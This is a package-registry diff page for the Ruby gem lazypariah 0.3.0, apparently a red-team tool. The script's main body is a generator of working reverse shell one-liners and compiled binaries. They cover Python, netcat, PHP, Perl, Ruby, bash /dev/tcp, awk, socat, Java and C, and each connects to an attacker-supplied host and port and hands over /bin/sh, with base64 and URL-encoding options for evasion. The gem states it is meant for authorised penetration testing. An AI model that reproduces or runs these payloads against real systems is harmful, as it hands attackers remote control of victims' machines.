lazypariah 0.3.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of lazypariah might be problematic. Click here for more details.

Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/bin/lazypariah +294 -0
  3. metadata +51 -0
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: ce53f8f317c07ff9692f984dcf1b4854ef9775f0cd10d62cbb010dd0d5a8f8a9
4
+ data.tar.gz: 513ac2a8a3a6eef6548c5a7d515c5c5a55b63550ddbd432c49516a346f719984
5
+ SHA512:
6
+ metadata.gz: b2a86bb13615232d2cc9610728084e466ec70f9bb91c972c0f557990efde7cebbaead6b47906d088facffc2e2d35755dbc7ff93482ee93c06c51666b1b641a8f
7
+ data.tar.gz: 94da5b8370ffff1708d1c1e8c0b973f71d07d4c014592d5267f66fa61182a85fcf981e1928f63dc0241e5c54ea204bad29a5d0fa6fa7d3b23c665f1be0deb532
@@ -0,0 +1,294 @@
1
+ #!/usr/bin/env ruby
2
+ #
3
+ # Title: LAZYPARIAH
4
+ # Version: 0.3.0
5
+ # Description:
6
+ # LAZYPARIAH is a simple tool for generating various reverse shell payloads
7
+ # on the fly. It is intended to be used only in authorised circumstances by
8
+ # qualified penetration testers, security researchers and red team professionals.
9
+ #
10
+ # Copyright (C) 2020 Peter Bruce Funnell
11
+ #
12
+ # This program is free software: you can redistribute it and/or modify it under the terms of the GNU
13
+ # General Public License as published by the Free Software Foundation, either version 3 of the License,
14
+ # or (at your option) any later version.
15
+ #
16
+ # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even
17
+ # the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
18
+ # License for more details.
19
+ #
20
+ # You should have received a copy of the GNU General Public License along with this program. If not,
21
+ # see <https://www.gnu.org/licenses/>.
22
+
23
+ # Load the necessary gems.
24
+ require "base64"
25
+ require "optparse"
26
+ require "erb"
27
+ require "zlib"
28
+ require "stringio"
29
+
30
+ # Define constants.
31
+ PROGRAM_NAME = "LAZYPARIAH".freeze()
32
+ PROGRAM_VERSION = "0.3.0".freeze()
33
+ EXECUTABLE_NAME = "lazypariah".freeze()
34
+
35
+ # Define payload list.
36
+ PAYLOAD_LIST = [
37
+ "python",
38
+ "python3_c",
39
+ "python2_c",
40
+ "python_c",
41
+ "python3_b64",
42
+ "python2_b64",
43
+ "python_b64",
44
+ "nc",
45
+ "nc_pipe",
46
+ "php_fd_3",
47
+ "php_fd_4",
48
+ "php_fd_5",
49
+ "php_fd_6",
50
+ "php_fd_3_c",
51
+ "php_fd_4_c",
52
+ "php_fd_5_c",
53
+ "php_fd_6_c",
54
+ "php_fd_3_tags",
55
+ "php_fd_4_tags",
56
+ "php_fd_5_tags",
57
+ "php_fd_6_tags",
58
+ "perl",
59
+ "perl_c",
60
+ "ruby",
61
+ "ruby_c",
62
+ "ruby_b64",
63
+ "bash_tcp",
64
+ "awk",
65
+ "socat",
66
+ "java_class_binary",
67
+ "java_class_b64",
68
+ "java_class_gzip_b64",
69
+ "c_binary",
70
+ "c_binary_b64",
71
+ "c_binary_gzip",
72
+ "c_binary_gzip_b64"
73
+ ].sort()
74
+
75
+ # Define function for displaying program information.
76
+ def prog_info(donation_info=true)
77
+ puts("#{PROGRAM_NAME} #{PROGRAM_VERSION}")
78
+ puts("Copyright (C) 2020 Peter Bruce Funnell")
79
+ if donation_info
80
+ puts("\nBTC Donation Address (Author): 3EdoXV1w8H7y7M9ZdpjRC7GPnX4aouy18g")
81
+ end
82
+ end
83
+
84
+ # Initialise command line argument parser.
85
+ option_parser = OptionParser.new do |options|
86
+ options.banner = "\nUsage:\t#{EXECUTABLE_NAME} [OPTIONS] <PAYLOAD TYPE> <ATTACKER HOST> <ATTACKER PORT>\n"
87
+ options.banner << "Note:\t<ATTACKER HOST> may be an IPv4 address, IPv6 address or hostname.\n\n"
88
+ options.banner << "Example:\tlazypariah -u python3_b64 10.10.14.4 1555\n"
89
+ options.banner << "Example:\tlazypariah python2_c malicious.local 1337\n\n"
90
+ options.banner << "Valid Payloads:\n"
91
+ PAYLOAD_LIST.each do |p|
92
+ options.banner << "#{" "*4}#{p}\n"
93
+ end
94
+ options.banner << "\nValid Options:\n"
95
+ options.on("-h", "--help", "Display help text and exit.")
96
+ options.on("-l", "--license", "Display license information and exit.")
97
+ options.on("-u", "--url", "URL-encode the payload.")
98
+ options.on("-v", "--version", "Display version information and exit.\n\n")
99
+ end
100
+
101
+ # Define port_check method for strings.
102
+ class String
103
+ def port_check()
104
+ (self.to_i.to_s == self) and (self.to_i >= 0 and self.to_i <= 65535)
105
+ end
106
+ end
107
+
108
+ # Define print_output.
109
+ def print_output(s, url_encode=false)
110
+ if url_encode
111
+ print(ERB::Util.url_encode(s))
112
+ else
113
+ print(s)
114
+ end
115
+ end
116
+
117
+ # Attempt to parse command line arguments.
118
+ begin
119
+ arguments = Hash.new()
120
+ option_parser.parse!(into: arguments)
121
+ if arguments[:version]
122
+ prog_info(donation_info=false)
123
+ exit()
124
+ else
125
+ if arguments.length < 1 and ARGV.length < 1
126
+ prog_info()
127
+ puts("\nNo command line arguments were detected. Please consult the help text below for details on how to use #{PROGRAM_NAME}.\n")
128
+ puts(option_parser)
129
+ exit()
130
+ elsif arguments[:help]
131
+ prog_info()
132
+ puts(option_parser)
133
+ exit()
134
+ elsif arguments[:license]
135
+ prog_info(donation_info=false)
136
+ puts("\nThis program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <https://www.gnu.org/licenses/>.")
137
+ elsif ARGV.length < 3
138
+ prog_info()
139
+ puts("\nThe command line arguments given to #{PROGRAM_NAME} were insufficient. #{PROGRAM_NAME} requires a payload type, attacker IP address and an attacker port in order to generate a reverse shell payload.\n")
140
+ puts(option_parser)
141
+ exit()
142
+ elsif ARGV.length > 3
143
+ prog_info()
144
+ puts("\nToo many command line arguments were given to #{PROGRAM_NAME}.\n")
145
+ puts(option_parser)
146
+ exit()
147
+ elsif not PAYLOAD_LIST.include?(ARGV[0])
148
+ prog_info()
149
+ puts("\n#{PROGRAM_NAME} did not recognise the specified payload. Please consult the valid list of payloads below.\n")
150
+ puts(option_parser)
151
+ exit()
152
+ elsif not ARGV[2].port_check()
153
+ prog_info()
154
+ puts("\nThe specified port was invalid. Please specify a port between 0 and 65535 (inclusive).\n\n")
155
+ else
156
+ url_encode = arguments[:url] ? true: false
157
+ case ARGV[0]
158
+ when "python"
159
+ print_output("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);", url_encode=url_encode)
160
+ when "python3_c"
161
+ print_output("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode)
162
+ when "python2_c"
163
+ print_output("python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode)
164
+ when "python_c"
165
+ print_output("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode)
166
+ when "python3_b64"
167
+ code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
168
+ print_output("echo #{code} | base64 -d | python3", url_encode=url_encode)
169
+ when "python2_b64"
170
+ code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
171
+ print_output("echo #{code} | base64 -d | python2", url_encode=url_encode)
172
+ when "python_b64"
173
+ code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
174
+ print_output("echo #{code} | base64 -d | python", url_encode=url_encode)
175
+ when "nc"
176
+ print_output("nc -e /bin/sh #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode)
177
+ when "nc_pipe"
178
+ print_output("/bin/sh | nc #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode)
179
+ when "php_fd_3"
180
+ print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&3 >&3 2>&3\");", url_encode=url_encode)
181
+ when "php_fd_4"
182
+ print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&4 >&4 2>&4\");", url_encode=url_encode)
183
+ when "php_fd_5"
184
+ print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&5 >&5 2>&5\");", url_encode=url_encode)
185
+ when "php_fd_6"
186
+ print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&6 >&6 2>&6\");", url_encode=url_encode)
187
+ when "php_fd_3_c"
188
+ print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&3 >&3 2>&3\");'", url_encode=url_encode)
189
+ when "php_fd_4_c"
190
+ print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&4 >&4 2>&4\");'", url_encode=url_encode)
191
+ when "php_fd_5_c"
192
+ print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&5 >&5 2>&5\");'", url_encode=url_encode)
193
+ when "php_fd_6_c"
194
+ print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&6 >&6 2>&6\");'", url_encode=url_encode)
195
+ when "php_fd_3_tags"
196
+ print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&3 >&3 2>&3\");?>", url_encode=url_encode)
197
+ when "php_fd_4_tags"
198
+ print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&4 >&4 2>&4\");?>", url_encode=url_encode)
199
+ when "php_fd_5_tags"
200
+ print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&5 >&5 2>&5\");?>", url_encode=url_encode)
201
+ when "php_fd_6_tags"
202
+ print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&6 >&6 2>&6\");?>", url_encode=url_encode)
203
+ when "perl"
204
+ print_output("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};", url_encode=url_encode)
205
+ when "perl_c"
206
+ print_output("perl -e 'use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", url_encode=url_encode)
207
+ when "ruby"
208
+ print_output("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", url_encode=url_encode)
209
+ when "ruby_c"
210
+ print_output("ruby -e 'require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'", url_encode=url_encode)
211
+ when "ruby_b64"
212
+ code = Base64.strict_encode64("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end")
213
+ print_output("echo #{code} | base64 -d | ruby", url_encode=url_encode)
214
+ when "bash_tcp"
215
+ print_output("bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode=url_encode)
216
+ when "awk"
217
+ print_output("awk 'BEGIN {s = \"/inet/tcp/0/#{ARGV[1]}/#{ARGV[2]}\"; while(42) {do {printf \"[Awk Reverse Shell] >> \" |& s; s |& getline c; if (c) {while ((c |& getline) > 0) print $0 |& s; close(c);}} while (c != \"exit\") close(s);}}' /dev/null", url_encode=url_encode)
218
+ when "socat"
219
+ print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh")
220
+ when "java_class_binary", "java_class_b64", "java_class_gzip_b64"
221
+ code = "import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;import java.net.Socket;public class rs {public rs() throws Exception {Process p=new ProcessBuilder(\"/bin/sh\").redirectErrorStream(true).start();Socket s=new Socket(\"#{ARGV[1]}\",#{ARGV[2]});InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0) {so.write(pi.read());}while(pe.available()>0) {so.write(pe.read());}while(si.available()>0) {po.write(si.read());}so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;} catch (Exception e) {}}p.destroy();s.close();}}"
222
+
223
+ temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
224
+ temp_file = temp_dir+"/rs.java"
225
+
226
+ system("echo '#{code}' > #{temp_file}; javac #{temp_file};")
227
+
228
+ File.open(temp_dir+"/rs.class", "r") do |f|
229
+ java_payload = f.read()
230
+ case ARGV[0]
231
+ when "java_class_binary"
232
+ print_output(java_payload)
233
+ when "java_class_b64"
234
+ java_payload_b64 = Base64.strict_encode64(java_payload)
235
+ print_output(java_payload_b64, url_encode=url_encode)
236
+ when "java_class_gzip_b64"
237
+ sio = StringIO.new()
238
+ sio.binmode()
239
+ gz = Zlib::GzipWriter.new(sio)
240
+ gz.write(java_payload)
241
+ gz.close()
242
+ java_payload_gzip = sio.string
243
+ java_payload_gzip_b64 = Base64.strict_encode64(java_payload_gzip)
244
+ print_output(java_payload_gzip_b64, url_encode=url_encode)
245
+ end
246
+ end
247
+
248
+ system("rm -r #{temp_dir}")
249
+ when "c_binary", "c_binary_gzip", "c_binary_b64", "c_binary_gzip_b64"
250
+ code = "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\nint main(void){int port = #{ARGV[2]};struct sockaddr_in revsockaddr;int sockt = socket(AF_INET, SOCK_STREAM, 0);revsockaddr.sin_family = AF_INET;revsockaddr.sin_port = htons(port);revsockaddr.sin_addr.s_addr = inet_addr(\"#{ARGV[1]}\");connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));dup2(sockt, 0);dup2(sockt, 1);dup2(sockt, 2);char * const argv[] = {\"/bin/sh\", NULL};execve(\"/bin/sh\", argv, NULL);\nreturn 0;}"
251
+
252
+ temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
253
+ temp_file = temp_dir+"/rs.c"
254
+
255
+ system("echo '#{code}' > #{temp_file}; gcc #{temp_file} -o #{temp_dir+"/rs"};")
256
+
257
+ File.open(temp_dir+"/rs", "r") do |f|
258
+ binary_payload = f.read()
259
+ case ARGV[0]
260
+ when "c_binary"
261
+ print_output(binary_payload)
262
+ when "c_binary_b64"
263
+ binary_payload_b64 = Base64.strict_encode64(binary_payload)
264
+ print_output(binary_payload_b64)
265
+ when "c_binary_gzip"
266
+ sio = StringIO.new()
267
+ sio.binmode()
268
+ gz = Zlib::GzipWriter.new(sio)
269
+ gz.write(binary_payload)
270
+ gz.close()
271
+ binary_payload_gzip = sio.string
272
+ print_output(binary_payload_gzip, url_encode)
273
+ when "c_binary_gzip_b64"
274
+ sio = StringIO.new()
275
+ sio.binmode()
276
+ gz = Zlib::GzipWriter.new(sio)
277
+ gz.write(binary_payload)
278
+ gz.close()
279
+ binary_payload_gzip = sio.string
280
+ binary_payload_gzip_b64 = Base64.strict_encode64(binary_payload_gzip)
281
+ print_output(binary_payload_gzip_b64, url_encode=url_encode)
282
+ end
283
+ end
284
+
285
+ system("rm -r #{temp_dir}")
286
+ end
287
+ end
288
+ end
289
+ rescue OptionParser::InvalidOption, OptionParser::MissingArgument
290
+ # Invalid command line arguments were detected. Say so, display the help text, and exit.
291
+ puts("\nOne or more command line arguments were invalid.\n")
292
+ puts(option_parser)
293
+ exit()
294
+ end
metadata ADDED
@@ -0,0 +1,51 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: lazypariah
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.3.0
5
+ platform: ruby
6
+ authors:
7
+ - Peter Funnell
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2020-11-23 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
14
+ on the fly. It is intended to be used only in authorised circumstances by qualified
15
+ penetration testers, security researchers and red team professionals. Before downloading,
16
+ installing or using this tool, ensure that you understand the relevant laws in your
17
+ jurisdiction. The author of this tool does not endorse the usage of this tool for
18
+ illegal or unauthorised purposes.
19
+ email: hello@octetsplicer.com
20
+ executables:
21
+ - lazypariah
22
+ extensions: []
23
+ extra_rdoc_files: []
24
+ files:
25
+ - bin/lazypariah
26
+ homepage: https://github.com/octetsplicer/LAZYPARIAH
27
+ licenses:
28
+ - GPL-3.0+
29
+ metadata: {}
30
+ post_install_message:
31
+ rdoc_options: []
32
+ require_paths:
33
+ - lib
34
+ required_ruby_version: !ruby/object:Gem::Requirement
35
+ requirements:
36
+ - - ">="
37
+ - !ruby/object:Gem::Version
38
+ version: 2.7.1
39
+ required_rubygems_version: !ruby/object:Gem::Requirement
40
+ requirements:
41
+ - - ">="
42
+ - !ruby/object:Gem::Version
43
+ version: '0'
44
+ requirements:
45
+ - A GNU/Linux or BSD operating system. Optional requirements are GCC (for C payloads)
46
+ and OpenJDK (for Java payloads).
47
+ rubygems_version: 3.1.2
48
+ signing_key:
49
+ specification_version: 4
50
+ summary: A tool for generating reverse shell payloads on the fly.
51
+ test_files: []